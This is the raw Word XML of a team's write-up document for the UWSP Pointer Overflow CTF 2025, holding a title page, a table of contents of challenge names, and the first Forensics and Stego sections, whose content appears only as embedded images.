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29A1" w14:textId="6C41CD39" w:rsidR="005838A0" w:rsidRPr="005838A0" w:rsidRDefault="005838A0" w:rsidP="005838A0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Agency FB" w:hAnsi="Agency FB"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005838A0">
        <w:rPr>
          <w:rFonts w:ascii="Agency FB" w:hAnsi="Agency FB"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="00B0F0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3E468574" wp14:editId="2E079E8C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1202267</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1080000" cy="1080000"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="608320121" name="Picture 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0121" name="Picture 2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838A0">
        <w:rPr>
          <w:rFonts w:ascii="Agency FB" w:hAnsi="Agency FB"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="00B0F0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48F2685B" wp14:editId="2F1BCE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0000" cy="1080000"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1910847272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7272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38A0">
        <w:rPr>
          <w:rFonts w:ascii="Agency FB" w:hAnsi="Agency FB"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1C3GH3TT0 – JUKE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136C9B60" w14:textId="2B77BC67" w:rsidR="005838A0" w:rsidRDefault="005838A0" w:rsidP="005838A0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Agency FB" w:hAnsi="Agency FB"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005838A0">
        <w:rPr>
          <w:rFonts w:ascii="Agency FB" w:hAnsi="Agency FB"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WRITEUPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03990538" w14:textId="77777777" w:rsidR="005838A0" w:rsidRPr="00BC5416" w:rsidRDefault="005838A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8F7328" w14:textId="7DAD8EC8" w:rsidR="005838A0" w:rsidRPr="00D31FC9" w:rsidRDefault="00E31C82" w:rsidP="005838A0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UWSP Pointer Overflow CTF</w:t>
      </w:r>
      <w:r w:rsidR="00243F90">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005838A0" w:rsidRPr="005838A0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9B5C0E" w14:textId="77777777" w:rsidR="00A96003" w:rsidRPr="00AA3958" w:rsidRDefault="00A96003" w:rsidP="005838A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F0672A9" w14:textId="713EFF3A" w:rsidR="00A96003" w:rsidRPr="00960686" w:rsidRDefault="00E31C82" w:rsidP="005838A0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6B3E6D" wp14:editId="69724021">
            <wp:extent cx="5274310" cy="4215130"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="692389320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89320" name="Picture 2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4D1C" w14:textId="77777777" w:rsidR="0018145A" w:rsidRPr="00BC5416" w:rsidRDefault="0018145A" w:rsidP="005838A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas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615629341"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="7ABB6483" w14:textId="08F8F4C6" w:rsidR="0018145A" w:rsidRDefault="002A437D" w:rsidP="00A513EE">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              <w:lang w:val="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="002A437D">
            <w:rPr>
              <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              <w:lang w:val="en-GB"/>
            </w:rPr>
            <w:t>Categories</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="262B2A7B" w14:textId="77777777" w:rsidR="00A513EE" w:rsidRPr="00A513EE" w:rsidRDefault="00A513EE" w:rsidP="00A513EE">
          <w:pPr>
            <w:rPr>
              <w:lang w:val="en-GB" w:eastAsia="el-GR"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="3F69C207" w14:textId="515750A7" w:rsidR="002460A7" w:rsidRDefault="002A437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r w:rsidRPr="00086989">
            <w:rPr>
              <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00086989">
            <w:rPr>
              <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00086989">
            <w:rPr>
              <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc213279015" w:history="1">
            <w:r w:rsidR="002460A7" w:rsidRPr="008E6456">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Forensics</w:t>
            </w:r>
            <w:r w:rsidR="002460A7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="002460A7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="002460A7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213279015 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="002460A7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="002460A7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002460A7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="002460A7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="574549C1" w14:textId="197BAB84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16" w:history="1">
            <w:r w:rsidRPr="008E6456">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Forensics 100-2 The Night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B4855" w14:textId="2D3F173A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17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Forensics 100-4 Trace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2A8D7" w14:textId="680B8CED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18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Forensics 200-2 Wintermute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1047" w14:textId="58D1B1C2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19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Forensics 300-1 Built Up in my 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15B44" w14:textId="4FBAB26E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0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Forensics 300-2 The Sound and the Fury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739FD" w14:textId="0E59D72A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1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Forensics 400 Storm Over the Prairie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8632C" w14:textId="4275A513" w:rsidR="002460A7" w:rsidRDefault="002460A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2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Stego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54AB" w14:textId="68A0BFE2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3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Stego 100-1 Ink Between the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FB1C" w14:textId="41554126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4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Stego 100-2 The Quiet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5CF3" w14:textId="6F767C55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5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Stego 100-3 Low Tide at Midnight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D92E" w14:textId="45111323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6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Stego 200-1 Needle in the Chorus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79C6" w14:textId="2323D737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7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Stego 300-1 Ouroboros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D8662" w14:textId="07F66149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8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Stego 300-2 Blind Man's Bluff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93557" w14:textId="7A5804D0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29" w:history="1">
            <w:r w:rsidRPr="008E6456">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Stego 400 The Weight of Silence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03F58" w14:textId="0F284E0F" w:rsidR="002460A7" w:rsidRDefault="002460A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0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Misc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AECCF" w14:textId="02A8938F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1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Misc 100-2 The Seven Year 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92DE" w14:textId="3C6E9040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2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Misc 200-1 Mason, In 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E4E67" w14:textId="49FFA252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3" w:history="1">
            <w:r w:rsidRPr="008E6456">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Misc 200-2 Mouthful of Marbles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93B7" w14:textId="6124D705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4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Misc 300-1 La Catedral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CC90" w14:textId="58A4BDF9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5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Misc 400 Digital Palimpsest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99E89" w14:textId="2D31FC78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6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Misc (Stego) 200-3 Dead Letter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A8A9" w14:textId="6DB5CDF6" w:rsidR="002460A7" w:rsidRDefault="002460A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7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Reversing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52C2" w14:textId="32756D2A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8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Reverse 100-4 Gremlins in the Gears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9D83" w14:textId="6C200BE3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39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Reverse 300-1 Through a Glass Darkly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9DE8" w14:textId="37E6CB32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0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Reverse 300-2 Make the Pieces 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95A9" w14:textId="342DAC2F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1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Reverse 400 Saint's Rowboat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6012" w14:textId="650C115D" w:rsidR="002460A7" w:rsidRDefault="002460A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2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OSINT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46B1" w14:textId="6025D6F8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3" w:history="1">
            <w:r w:rsidRPr="008E6456">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:noProof/>
              </w:rPr>
              <w:t>OSINT 200-1 The Paper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EB7F7" w14:textId="03F02C6B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4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OSINT 400 Behave, Ye Strangers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3308" w14:textId="71F47D5C" w:rsidR="002460A7" w:rsidRDefault="002460A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5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68B81" w14:textId="265A3F76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6" w:history="1">
            <w:r w:rsidRPr="008E6456">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Web 100-4 Redirection Junction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2A649" w14:textId="3AD97B6B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7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Web 200-1 What's Mine is Yours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210DE" w14:textId="4874FCC5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8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Web 300-1 Friend of a Friend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E008" w14:textId="0B63B0BB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49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Web 300-2 The Shape of Water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83C0A" w14:textId="5E3CB6B2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50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Web 400 Mouth of Sauron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411F" w14:textId="719F2C91" w:rsidR="002460A7" w:rsidRDefault="002460A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51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Crypto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32073" w14:textId="28571018" w:rsidR="002460A7" w:rsidRDefault="002460A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213279052" w:history="1">
            <w:r w:rsidRPr="008E6456">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Crypto 200-1 Two Wrongs Make a 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C1D9" w14:textId="4EA09B9E" w:rsidR="002A437D" w:rsidRPr="00A513EE" w:rsidRDefault="002A437D">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00086989">
            <w:rPr>
              <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              <w:b/>
              <w:bCs/>
              <w:lang w:val="en-GB"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="57625DBF" w14:textId="77777777" w:rsidR="005838A0" w:rsidRDefault="005838A0" w:rsidP="005838A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C8BD6B8" w14:textId="77777777" w:rsidR="0018145A" w:rsidRDefault="0018145A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="278E4740" w14:textId="24A014EE" w:rsidR="0013654D" w:rsidRPr="00E31C82" w:rsidRDefault="00E31C82" w:rsidP="0013654D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc213279015"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Forensics</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="1C5127F6" w14:textId="77777777" w:rsidR="0013654D" w:rsidRPr="0013654D" w:rsidRDefault="0013654D" w:rsidP="0013654D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="097BB279" w14:textId="1B4C1CE2" w:rsidR="00D31FC9" w:rsidRPr="00E31C82" w:rsidRDefault="00E31C82" w:rsidP="0013654D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc213279016"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E31C82">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Forensics</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E31C82">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> 100-2 The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E31C82">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Night</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E31C82">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E31C82">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Shift</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F5983CA" w14:textId="40F0A6A1" w:rsidR="0088214D" w:rsidRPr="0082512F" w:rsidRDefault="00E31C82" w:rsidP="00243F90">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="331847C9" wp14:editId="713DAE89">
            <wp:extent cx="3600000" cy="1990476"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="45384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9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5548" w14:textId="6C54B1A8" w:rsidR="00E31C82" w:rsidRPr="00E31C82" w:rsidRDefault="00E31C82" w:rsidP="00E31C82">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc213279017"/>
      <w:r w:rsidRPr="00E31C82">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Forensics 100-4 Trace Elements</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="34787766" w14:textId="7F66B63A" w:rsidR="00E31C82" w:rsidRDefault="00E31C82" w:rsidP="00243F90">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E31C82">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2269C276" wp14:editId="53203D88">
            <wp:extent cx="3734321" cy="1095528"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="942981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12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24AC" w14:textId="362BBD0E" w:rsidR="0082512F" w:rsidRPr="00E31C82" w:rsidRDefault="0082512F" w:rsidP="0082512F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc213279018"/>
      <w:r w:rsidRPr="0082512F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Forensics 200-2 Wintermute</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="698140AD" w14:textId="738B1C3C" w:rsidR="00E31C82" w:rsidRDefault="0082512F" w:rsidP="00243F90">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AC728A7" wp14:editId="1F43B2FD">
            <wp:extent cx="3171429" cy="752381"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="922617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171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33C6" w14:textId="47EC14B9" w:rsidR="00AD58A6" w:rsidRDefault="00AD58A6" w:rsidP="00AD58A6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc213279019"/>
      <w:r w:rsidRPr="00AD58A6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Forensics 300-1 Built Up in my Head</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="344DE91C" w14:textId="754292FD" w:rsidR="00AD58A6" w:rsidRPr="00AD58A6" w:rsidRDefault="00AD58A6" w:rsidP="00AD58A6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD58A6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="160DF3F7" wp14:editId="4A1BACBB">
            <wp:extent cx="4372585" cy="1133633"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1322812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29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06ED" w14:textId="2A13A86D" w:rsidR="00AD58A6" w:rsidRDefault="00A643FC" w:rsidP="00AD58A6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc213279020"/>
      <w:r w:rsidRPr="00A643FC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Forensics 300-2 The Sound and the Fury</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="67C2A22C" w14:textId="6AB99BF5" w:rsidR="00A643FC" w:rsidRPr="00A643FC" w:rsidRDefault="00A643FC" w:rsidP="00A643FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A643FC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DA0E41D" wp14:editId="763C594F">
            <wp:extent cx="3019846" cy="2286319"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="8879243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430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36F2" w14:textId="39182BCB" w:rsidR="0082512F" w:rsidRDefault="00A643FC" w:rsidP="00AD58A6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc213279021"/>
      <w:r w:rsidRPr="00A643FC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Forensics 400 Storm Over the Prairie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="2C7968C2" w14:textId="4D2FD9E9" w:rsidR="00A643FC" w:rsidRDefault="00A643FC" w:rsidP="00A643FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A643FC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FC78E65" wp14:editId="3B445955">
            <wp:extent cx="3572374" cy="2486372"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="20285518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5181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B1BB" w14:textId="77777777" w:rsidR="002324D7" w:rsidRPr="00A643FC" w:rsidRDefault="002324D7" w:rsidP="00A643FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E27C07A" w14:textId="77777777" w:rsidR="002460A7" w:rsidRDefault="002460A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc213279022"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB14ED1" w14:textId="2061AC9D" w:rsidR="0013654D" w:rsidRDefault="002324D7" w:rsidP="0013654D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Stego</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5C29A548" w14:textId="77777777" w:rsidR="0013654D" w:rsidRPr="0013654D" w:rsidRDefault="0013654D" w:rsidP="0013654D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44B690A6" w14:textId="64A660A0" w:rsidR="0013654D" w:rsidRPr="0013654D" w:rsidRDefault="002324D7" w:rsidP="0013654D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc213279023"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002324D7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stego</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002324D7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 100-1 Ink Between the Lines</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="7DC69D0B" w14:textId="39380B00" w:rsidR="0013654D" w:rsidRDefault="002324D7" w:rsidP="00243F90">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002324D7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="360AE2BB" wp14:editId="1E272241">
            <wp:extent cx="3715268" cy="981212"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="18296745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74597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464B" w14:textId="10270A40" w:rsidR="00617944" w:rsidRDefault="00617944" w:rsidP="00617944">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc213279024"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00617944">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stego</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00617944">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 100-2 The Quiet Part</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="412DA70F" w14:textId="12F002EC" w:rsidR="00617944" w:rsidRPr="00617944" w:rsidRDefault="00617944" w:rsidP="00617944">
      <w:pPr>
        <w:rPr>
